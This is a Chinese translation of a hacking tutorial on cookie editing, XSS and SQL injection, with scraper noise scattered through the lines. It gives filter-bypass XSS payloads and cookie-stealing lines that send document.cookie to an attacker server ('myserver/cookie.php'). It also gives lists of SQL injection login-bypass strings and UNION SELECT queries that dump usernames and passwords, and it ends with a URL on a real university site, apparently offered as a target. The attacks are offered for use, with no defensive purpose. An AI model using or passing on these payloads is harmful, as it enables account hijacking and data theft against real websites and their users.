XSS & SQL注入

admin

XSS & SQL注入
9 G( k; X( ?' W" G+ E# j9 e, N文章作者：CyberPhreak
译文作者：黯魂 [S.S.T]
1 p' ?' N$ b9 `) p$ G' V  p' S- U
5 K$ r2 d, J) f
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
; M6 ?8 E1 d0 V$ K. k3 cX Web Security - XSS & more X
) r4 g; k0 y8 d# l0 r5 _XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+ X* O3 h6 b* B8 @7 ~/ B0 ~

~介绍

在这篇文章中我将说明所有关于XSS以及更多相关的知识.通过这篇文档,我希望能让你明白什么是XSS,为什么使用XSS,以及怎样使用XSS.一旦你学会了,你将需要发挥自己的创造力,因为大多数人都修补了简单的XSS漏洞.但是他们所忘记做的是修补比XSS的一个字符串更多的漏洞,并且php中特殊安全机制被用来防御XSS,而取代他们自己的方法.同时我将阐述的不仅仅是XSS,而是所有的web安全.

7 B: M* ]; _, Y( R8 {+ g/ FXXXXXXXXXXXXXXXXXXXXX
X Table OF Contents X
XXXXXXXXXXXXXXXXXXXXX
5 F. r0 t2 q  _0 v5 z: E; l* x
. x9 @% M. w0 q; x, Z" mXXXXXXXXXXXXXXXXXXXX
, V% {1 O4 u, s; z& ^, ~X Cookie Editing X
2 R" r. i3 l' O5 a3 NX XSS X
, V: ?1 l0 j7 V9 n: t+ rX SQL Injection X
( r/ o$ |  A) p6 HXXXXXXXXXXXXXXXXXXXX
* e+ O1 v" U3 |/ a2 \
~什么是cookie

4 s$ [4 k* Y- k5 W  w6 hcookie就是一块数据.一旦你浏览一个站点并且注册一个帐号,一个cookie就被设置以记录你的信息.cookie仅仅保存你登录的信息以使站点检测以前你是否登录过,如果不是,它就会检测你的用户名和密码的正确性,然后登录.比如说在一个夜总会,你买了一张票,他们就会给你一张卡.因此你可以进进出出而不用每次都买票.而cookies比你所能看到的要复杂得多.夜总会只能记住你一晚上,但是cookies却能记住你一辈子.
9 p8 k$ {; |* a; z4 i( @
~警告&欺骗

那么现在你知道了cookie是什么...你如何看待它们?事实上,cookie编辑(修改)是最简单的方法之一.只要有一个浏览器,你就能够查看和编辑cookies,并且只需要一些基础的javascript知识.打开你的浏览器然后随便去一个网站吧,登录...现在输入javascript:alert(document.cookie).这时你应该可以看见一个用户名和密码.然而大多数站点现在都不使用cookies,而使用sessions.很遗憾,sessions不能被修改(服务端可以),不像cookies,一旦你修改了一个cookie你就可以欺骗你自己.现在让我们开始欺骗...假设你看到了一个警告框并且看到一些像这样的内容:

strusername=cnsst;strpassword=cnsst

" [  z) J& D' I7 n& i* L  k2 ~0 s此时假设你知道'bitch'是一个管理员,可是你不知道密码. 由于脆弱的安全机制你不需要密码:javascript:void(document.cookie="strusername=bitch")
" o/ t% h# x+ {( l  }现在输入:javascript:alert(document.cookie).那几乎非常接近cookie修改了...
4 t) z  ?9 S6 H* d
/ S" m( M$ D% D9 }9 Q+ r~什么是XSS

XSS,或者CSS,不管你更喜欢怎样称呼它,XSS(CSS)都代表着跨站脚本.基本上意思就是你能以任何方式注入脚本,来让它完成你想要做的.通过XSS你也可以截获输入信息,像用户名,密码以及cookies.这都将被讨论,所以接下来将会有很多例子,我们这篇文章应该能够帮你在XSS上发挥自己的创造力.

/ n8 Y5 \& i% r8 L1 _6 f3 Z~为什么使用XSS
9 V$ G/ ?1 t# A3 b4 y1 W- D$ G
很明显的问题,通过XSS你能在客户端和服务器端执行任何类型的脚本.然而XSS却不仅仅局限于执行脚本上,还能截获输入.输入类似:<input name="name" type="name">
你通过XSS截获输入,然后通过一个秘密文件把截获到的信息发送向你的站点.而这一切绝不是XSS所能实现的全部作用.XSS还能截获cookies.Cookies保存着有价值的信息,像用户名,密码等等.

- B0 I/ _1 v' F! S6 S~让我们开始吧…
2 s2 i  h' h; J* f2 i
我假定你知道html和javascript,而php知识也有帮助,但却不是必要的.让我们从这个php脚本开始.
; I) H1 K% w/ m
XSS--跨站脚本&lt;html&gt;
  \; C4 Z3 A" V. _. r7 c  m
&lt;body&gt;

&lt;form action="" method="GET"&gt;

8 T. f. W% q5 h( g+ W&lt;!-- 我使用的GET方法,因为当我们利用的时候更容易练习. --&gt;

Script: &lt;input name="name" type="name"&gt;
# K" q' p; O8 v" ~% \! z
+ N. x5 c; e2 ?- B8 v4 b/ E' [0 Z&lt;input type="submit" value="submit"&gt;
; q& v5 W: S8 Z& C& R% F0 p
0 d7 y( O/ M7 `) q0 O&lt;/form&gt;

; q5 ~+ a" ?. l9 H- D' `&lt;/body&gt;

; y6 h+ L% j8 M3 |&lt;/html&gt;
9 }# p, n. q9 a- g

" l$ p& b9 z8 T- V( o2 {# u0 q
2 w! ~2 r+ j$ q3 k&lt;?php

$name = $_GET['name'];
- r* m, a5 l5 u) w& W
: a2 w1 ]* a+ P! ?echo("Hello $name");

8 e+ q: T1 K9 y?&gt;
复制代码OK,我们应该都知道上面的代码有什么用...这是一个非常奇怪的脚本,没有一个人会在自己的站点上使用它(至少我没见过),但是它对初学者理解原理却真的很有用.来看看我输入后所得到的信息:

: j+ Q5 n9 q) pcnsst
"Hello cnsst!"

+ o2 G& J; D) A# K引号内的信息就是输出信息..注意看,现在我输入:
<script>alert(document.cookie)</script>
8 V1 V+ M6 k. j, I: P$ [
% {& t, u8 ~  c7 p8 n, s那么它将会弹出document.cookie!所以它是易受XSS攻击的!

- |5 I7 t" I. c8 Y现在我们已经对XSS有了一点了解,那让我们理解它.首先,脚本做的是取得你的输入然后粘贴它.嗯...也就是说我们能输入任何数据.所以?等等...任何数据...好的,你想问客户端和服务器端分别有什么语言? 让我告诉你,基本上客户端语言是建立在你客户端浏览器之上的:JavaScript,html, VBScript等等...
0 I+ b5 [. n" O& ~7 T
服务器端语言在另一边,不是建立在你客户端之上的,而建立在服务器之上,有php,asp等等...

2 P: Y& j. q& E5 O6 {, V" |( O4 F7 o已有一些方法注入php,稍后我将说明.现在先想想这怎样才能对我们有帮助?注入javascript?简单.比如说你正在编写一个网站程序,由于是你的站点,所以你能使用所有你想使用的javascript(JS).因此其他任何人也可以,因为XSS允许你让网站运行你想要运行的任何脚本.

) `5 B. @8 E, f让我们看一个稍微复杂点的例子!

假设你已经输入了<script>alert(document.cookie)</script>,并且回显是这样的:
scriptalert(document.cookie)/script
! b% W7 b# F2 k" l$ E或者可能是这样的:
3 ?  L) m2 |7 yscriptalertdocument.cookie/script

可以看出更难利用了...不过有很多方法使用XSS,这只是其中一种.而且是其中最烂的方法之一.你看到当中的"<>"都被空字符" "替换了.

, k1 C% d- {3 _1 y  d7 j* {) \让我们继续利用:
<<script>>alert(document.cookie)<</script>>

2 d- g- k  Y& q4 u" ^" X你的输出将弹出document.cookie.

* R. j3 o# K3 v8 L$ e: p% Y7 p现在来看看更狠的:
1 n+ h& V- k6 e9 D( ^<<script>>alert((document.cookie))<<//script>>


* r( s( m' s5 G  J# m他们可能会替换所有的,或者只是"<>".所以如果一对不能得以执行,另一对就可以.现在,如果你看到:
" d' t% H0 f; z: K7 [scriptalertdocument.cookie/script
或者 <<<script>>>alert(document.cookie)<<</script>>>  
/ C6 H( t3 F9 V8 b, J. a( W
他们可能替换2对来欺骗你,或者替换一些字母.试着用你自己的方法来利用...你输入:
<script>alert(document.cookie)</script>

输出像这样:srplert(document.cookie)srp
7 T( ^' {6 G& P$ L! H& \9 k
仔细观察,你就会发现document.cookie中并没有什么被替换.为什么呢? 因为他们并不清楚你想要alert什么,以及你想做什么.所以他们只是猜测,就只阻止了"<>"以及script部分.怎么绕过?看看这个:
1 D% K$ B: B5 X2 k' |. V' |' I<<sccriiptt>>aalert(document.cookie)<<//sccriiptt>>
, x% v+ K- ~  _! d: M9 i
) X) C) p' K2 f6 a9 a/ a% d: R* X所有重复多余的部分刚好被替换!现在让我们来点更高级的!

) n7 a% \7 W3 o- p+ m这次他们使用的仍然是替换,但是却检查了整个字符串!例如:
& D8 g! G5 R# `, p% x0 J<script>alert(document.cookie)</script>

) z) u* [) _6 M3 M$ C% k( [( r输出将是:
& ~! ~2 v! }* }0 D$ E6 V+ P5 qscriptalert(document.cookie)script

7 J& h4 j% v9 |  |9 B, F看到这,你激动地说,"我知道该怎么做了!" OK,让我们按照你的方法来重新构造:
* q5 O& _( m9 w, r<<script>>alert(document.cookie)<</script>>

9 V2 R) D1 [5 C- }. K9 Y9 v输出:scriptalert(document.cookie)script. 这时你可能会继续增加更多的<>.可是,他们替换了任何"<>",无论你输入多少个...看到我说"任何"了吗?使用下面这个例子:

<
script
>
0 P! M1 F+ V  o/ q0 X6 K! _alert
(
document
.
5 @+ Z0 n  t- @) g, ecookie
)
<
# `' N3 H/ M3 a/ n/
script
>

* s0 F8 q7 k9 n! K( {2 B. ]
看看它,它没有替换"<>",它替换代码关键字.所以即便你写的是一句没有"<>"的代码,将仍然被替换,这就是我们为什么这样写的原因.假如对方使用更严格的标准,替换任何类型的代码,甚至是"alert"! 我们又该怎么改进呢?看看这个:
<
+ {) g4 H! h# {! A. P+ F7 H8 xs
c
r
i
p
. k5 [4 w2 v: i6 F- a% ~8 c9 R; |# Qt
>
- R* }9 z& |& |% S* Qa
l
e
r
  A+ }. C2 r0 Z. y+ v  D2 xt
: i( Y4 p* W: ](
! `. [- `4 p$ `& D5 S2 ?% Q1 T9 [: `d
o
3 I6 Y1 C$ A! s0 J: M3 L4 yc
u
m
: V( H* m6 _* Ie
2 w9 s5 W; z+ {, M3 i. Cn
# o3 ]) F. x: F+ ?, A5 Et
.
. Z% d$ Z" G6 H2 r: Yc
o
6 l# Z& P1 S5 D- t2 j5 Co
k
i
e
)
$ \7 M* T- E/ N* Z- v+ t/ c<
: n) g& S6 h) y8 g& W  t/
s
c
r
i
p
t
/
1 s% ?% j( e( b7 j: e, H>

这下应该可以了,但是如果他们仍然替换"<",你可以增加2对"<< >>"(并且你可以用任何字符取代document.cookie)

还有更多我可以演示的替换,但是我教你的只是想让你发挥自己的创造力.

现在让我来讲讲其他XSS方法.前面我们已经讨论了客户端XSS,那么现在就来看看服务器端XSS.
% [( L7 m4 h* z( l
首先让我说明它们之间的区别.客户端是从你浏览器经解释语言,如JavaScript (JS) VBScript (VBS)等而看到的.服务器端XSS是通过来自服务器端的语言,如php,asp等的XSS.客户端通过浏览器查看,服务器端通过服务器查看.

我们已经学会了怎样构造客户端XSS,而构造服务器端我们必须注入脚本到服务器上.要完成这个,我们需要找到一个像任何XSS的脚本,但是这个脚本能够保存你的XSS到服务器中.现在,假设你在一个网站上发表了一篇文章,现在要做的是取代文章,用XSS,为什么我们应该用JavaScript?为什么不用php?但是先让我给你看点东西.
4 n' i" j8 y) ~" ^- l( L. O9 ldocument.forms(0).action ="http://myserver/myscript.php
这既能在服务器端也能在客户端,没有关系.因此你的脚本将复制他们所输入的信息到那个表单中,并保存在我们站点上的一个*.txt文件中.

! q- J& m( o$ k$ H再次假设你在网站上注册了一个帐号,并且可以自定义资料...
document.images(0).src="http://myserver/cookie.php"+document.cookie.
: U& o7 _- |3 A3 d6 p1 c或者如果你有空间可以存放指向自定义内容的链接,你可以输入:
javascript:location.href="http://myserver/cookie.php"+document.cookie
这将截获访问我们资料的用户的cookie.这可以用于任何地方而不仅仅在资料上,它只是一个例子.
+ G5 e1 I" H# g+ c+ j- s+ |
6 }# B% n  a2 P8 G' h有时一个站点会回显你的UserAgent和Referer...现在让我们在DOS提示符下或者命令行窗口中试一试一些XSS,
. b. w; ]7 G: c* Stelnet example.com
- z; {  _% ^  E) \GET /page/toplacewhere_itechos_your_useragent.php HTTP/1.1
0 W; A7 I+ _- b/ D! c7 o$ ]User-Agent: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
- A' E8 `: t4 b; t" |) D- U5 pReferer: &lt;script&gt;alert(document.cookie)&lt;/script&gt;
~什么是SQL注入

5 x6 |& B: B; g1 i8 }1 S8 m5 oSQL注入,网站中最大的安全问题之一.那么到底什么是SQL注入?其实也就是注入SQL.现在让我们来挖掘不同级别的SQL漏洞.假设你有一个像这样的登录页面:&lt;html&gt;
, \0 v# p# }6 Z) u: w
% e+ h- g# x+ ]&lt;body&gt;

&lt;form action="" method="POST"&gt;
# @/ C' _5 \$ |& j5 L& U8 U
Username: &lt;input name="name" type="name"&gt;

Password: &lt;input name="password" type="password"&gt;
* Z' @6 Q* |/ i# T9 _5 [
+ |  c7 s0 \1 B&lt;input type="submit" type="submit" value="Submit"&gt;
8 S) G0 z  F2 P# d0 n6 m
- r9 D% A0 C2 O2 g4 D% [&lt;/form&gt;

; }: _/ `0 J) ?; g0 N&lt;/body&gt;

1 F9 W& _, t5 F4 j) M&lt;/html&gt;
  g! t3 [+ ^) ^+ M1 @复制代码这里面有一个XSS漏洞,但是不用担心它,没有办法猜出或者破解出密码.所以,我们该怎么办?SQL注入!

最简单的攻击是在用户名和密码那里输入"'".如果没有保护机制,此时你应该得到一个错误信息.如果你得到了,它就是极易受攻击的.可是错误信息毫无价值,除非你知道如何利用它.所以,我会给你一个你可以使用的注入列表,以便在你得到一个单引号的错误信息时使用.
  u9 p1 i- u- U8 R! Z
0 ^3 @6 s6 B+ G0 a  [' S) Z'='
) f% ]5 o" c  W'OR 1=1--
'OR a=a--
4 }8 g. S4 G2 r6 p'OR'
$ }" c4 l; r& K7 @0 t& Y
自从人们增强安全性以后,现在这些注入就很难发挥作用了,但是下面这个列表却是很多人在安全列表里没有注意到的:
7 q3 D, q; I% M
'OR''='
3 x9 ^4 n4 }- |4 S! S' s'OR"="
'OR'="
; }1 i  d# g- [7 s5 E'OR '="
'OR "='
'OR ''='
'OR '=''
1 ^$ E& U+ A% Q3 x1 [0 M'OR "=''
'OR ''="


. V/ E; T2 @! [~
现在让我说明UNION ALL SELECT声明,这将选出数据库中的一个表...所显示的内容取决于你所选择的列.
UNION ALL SELECT username,password FROM users
3 B/ p9 l* M" V! W' z
这个查询语句将执行,但是….如果毫无作用呢?
6 E8 d, N" [- r0 nUNION ALL SELECT username,password FROM users WHERE username='OR "='
' N- }$ ?/ _, I- Y8 XAND password='OR "='

  o& H" n6 [/ a你可能使用其他字符来替代'OR "='以注入存在的注入点.可是首先考虑一下,你是怎么知道表名的?实际上,你发现了一个SQL漏洞,它给了你错误信息,而错误信息包含了表名.

一旦你发现了漏洞,你就会按照习惯去用类似'OR "='的方法去进行注入,以得到表名.有时候你想从表中查询一些有用的数据,你却不得不选择所有的表,因为你并不知道所要查询的数据在哪个表里.下面的例子中存在20个不同表名的表,你试图查询一个ip的列表:
UNION ALL SELECT
ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip,ip FROM logs
WHERE ip='OR''="
% k. b9 f* e+ h) R
4 R9 f! c" N" ?现在你看到这个了吗?(我确信你已经看到了)
http://example.com/index.php?article=34
那将浏览Id为34的文章...让我们用"'"替换34:
http://example.com/index.php?article='

( D+ Y- p0 e* p- P
- B0 A3 c5 _1 a' p$ q2 h现在,记住我所说的,大多数人都没有意识到'所带来的不安全性,你总是能够尝试不同的注入方法,这里是一些例子:
http://example.com/index.php?article='
4 t  h9 n* }4 Y* n  Qhttp://example.com/index.php?article='='
' D- a7 n6 V) J- ~, whttp://example.com/index.php?article='OR 1=1--
7 L# Q2 n" e* s: ~' O7 }! S$ @: j8 r9 Yhttp://example.com/index.php?article='OR a=a--
http://example.com/index.php?article='OR '="
http://example.com/index.php?article='OR "='
+ K' \. U1 n* p' qhttp://example.com/index.php?article='OR ''='
; Y5 p1 D, r- K/ o. mhttp://example.com/index.php?article='OR '=''
. J/ z  A9 ^, u9 L( C' ohttp://example.com/index.php?article='OR''='
http://example.com/index.php?article='OR"'='
* z& m1 e6 m% K! R3 g6 g  j) mhttp://example.com/index.php?article='OR"''='

尽情发挥自己的创造力!
http://www.ie.tsinghua.edu.cn/notice/show.php?id=704